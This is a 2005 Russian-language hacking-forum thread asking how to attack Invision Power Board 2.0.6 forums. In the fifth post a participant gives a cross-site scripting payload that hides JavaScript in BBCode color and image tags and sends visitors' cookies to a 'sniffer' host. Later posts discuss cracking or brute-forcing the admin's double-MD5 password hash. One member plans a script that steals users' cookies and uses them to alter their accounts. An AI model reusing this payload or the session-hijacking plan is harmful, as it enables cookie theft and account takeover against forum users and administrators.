Вопрос про уязвимости в Ipb 2.0.6

Discussion in 'Песочница' started by Sh1z0iD, 20 Mar 2005.

  1. Sh1z0iD

    Sh1z0iD New Member

    Joined:
    18 Mar 2005
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Уважаемые Х люди
    кто знает уязвимость форума 2.0.6 ?
    заранее благодарен :confused:
     
  2. rsha1988

    rsha1988 Elder - Старейшина

    Joined:
    3 Jan 2005
    Messages:
    230
    Likes Received:
    3
    Reputations:
    0
    сниффер помойму можно туда вставить
     
  3. CunningFox

    CunningFox New Member

    Joined:
    3 Mar 2005
    Messages:
    65
    Likes Received:
    0
    Reputations:
    0
    да, снифф туда и точка :)
     
  4. chip

    chip Banned

    Joined:
    5 Mar 2005
    Messages:
    80
    Likes Received:
    0
    Reputations:
    0
    А эксплоит есть для него?
     
  5. rsha1988

    rsha1988 Elder - Старейшина

    Joined:
    3 Jan 2005
    Messages:
    230
    Likes Received:
    3
    Reputations:
    0
    PHP:
    [COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[12].src="http:/сниффер/me.jpg?K:"+document.cookie) [/COLOR]
     
    #5 rsha1988, 20 Mar 2005
    Last edited: 20 Mar 2005
  6. CunningFox

    CunningFox New Member

    Joined:
    3 Mar 2005
    Messages:
    65
    Likes Received:
    0
    Reputations:
    0
    rsha1988 странноватый у тебя снифф..
     
  7. (-=util=-)

    (-=util=-) Banned

    Joined:
    2 Dec 2004
    Messages:
    337
    Likes Received:
    8
    Reputations:
    2
    а что с хэшом делать потом будем? :) Как с админкой быть? Я незнаю. :\
     
  8. rsha1988

    rsha1988 Elder - Старейшина

    Joined:
    3 Jan 2005
    Messages:
    230
    Likes Received:
    3
    Reputations:
    0
    Ошибся малось, щас все иправил...
     
  9. rsha1988

    rsha1988 Elder - Старейшина

    Joined:
    3 Jan 2005
    Messages:
    230
    Likes Received:
    3
    Reputations:
    0
    шутиш?! :D
     
  10. (-=util=-)

    (-=util=-) Banned

    Joined:
    2 Dec 2004
    Messages:
    337
    Likes Received:
    8
    Reputations:
    2
    я нешучу =) Ты попробуй сам расшифруй от вторых версий хэш =) Там не чистый md5 а вроде дважды зашифровывается. Т.е. пароль в md5 а потом ещё раз в md5... вообще надо в исходник форума глянуть!
     
  11. chin

    chin php programmer

    Joined:
    19 Mar 2005
    Messages:
    38
    Likes Received:
    1
    Reputations:
    0
    Попробуй глянь...... Там так все запутано, что я, 3 года просидевший только за php, не могу разобраться что к чему! ;)
    Хотя, можно на досуге...
    А вообще, надо искать иной путь, вместо того чтобы брутить хеш админа. Надо подумать - всегда есть альтернативный вариант.
    Я тоже пробовать брутить пароль админа на IPB - безрезультатно.
    Кстати, хочу написать скриптик:
    - сниффит куки пользователя
    - заходит с куками (в заголовке) на панель управления пользователя
    - меняет ему аватару на нашу
    - уходит ;)
    Как вам идея? Я подумал, все взвесил - осуществимо!
     
  12. (-=util=-)

    (-=util=-) Banned

    Joined:
    2 Dec 2004
    Messages:
    337
    Likes Received:
    8
    Reputations:
    2
    Идея велеколепна. Ты представь сколько ламаков будет иметь форумы =\
     
  13. chin

    chin php programmer

    Joined:
    19 Mar 2005
    Messages:
    38
    Likes Received:
    1
    Reputations:
    0
    А ты представь, как админы после этого закопошатся в поисках дырок? :) Для них тогда хоть смысл их фиксить появится. А то сидят себе дырявые... хоть бы интересовались изредка...
     
  14. rsha1988

    rsha1988 Elder - Старейшина

    Joined:
    3 Jan 2005
    Messages:
    230
    Likes Received:
    3
    Reputations:
    0
    Не, ну так просто и быстро форум ломать не интерессно - быстро надоест.
    Лучше всетаки дооооолго брутить а потом получать удавольствие.
     
  15. Sh1z0iD

    Sh1z0iD New Member

    Joined:
    18 Mar 2005
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    прости а как вставить я пробовал не вставляется
    если представится возможность не мог бы ты снять видео ? :rolleyes: заранее благодарен...
     
  16. CunningFox

    CunningFox New Member

    Joined:
    3 Mar 2005
    Messages:
    65
    Likes Received:
    0
    Reputations:
    0
    форум хотябы в приват оставь, чтобы взглянуть что к чему..
     
  17. Xalegi

    Xalegi Elder - Старейшина

    Joined:
    24 Nov 2004
    Messages:
    109
    Likes Received:
    4
    Reputations:
    6
    дык... сам намути такой форум :)) как правило в последнее время для инвижиона ничего толком не меняется, так как считают, что он неуязвим =)))
    эт нам на руку... пока на руку
     
  18. CunningFox

    CunningFox New Member

    Joined:
    3 Mar 2005
    Messages:
    65
    Likes Received:
    0
    Reputations:
    0
    дак у него Ipb форум?
     
  19. Xalegi

    Xalegi Elder - Старейшина

    Joined:
    24 Nov 2004
    Messages:
    109
    Likes Received:
    4
    Reputations:
    6
    как я понял... ДА :)
    и вообще.. самое идеальное.. эт самому установить данный форум самому себе и изучать его изнутри... что и где может быть дырка =)
     
  20. CunningFox

    CunningFox New Member

    Joined:
    3 Mar 2005
    Messages:
    65
    Likes Received:
    0
    Reputations:
    0
    а не заметил названия топика :)